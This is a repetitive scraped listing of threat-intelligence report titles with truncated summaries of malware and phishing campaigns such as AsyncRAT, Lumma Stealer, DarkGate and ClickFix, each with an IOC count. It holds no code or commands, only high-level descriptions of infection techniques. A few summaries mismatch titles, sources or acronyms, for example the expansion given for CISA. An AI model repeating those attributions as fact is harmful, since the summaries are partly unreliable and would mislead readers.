The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ransomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to those of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ransomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to those of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
